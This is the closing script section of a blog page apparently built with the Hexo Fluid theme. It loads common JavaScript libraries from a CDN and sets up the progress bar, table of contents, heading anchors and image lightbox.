  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/openkounter.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
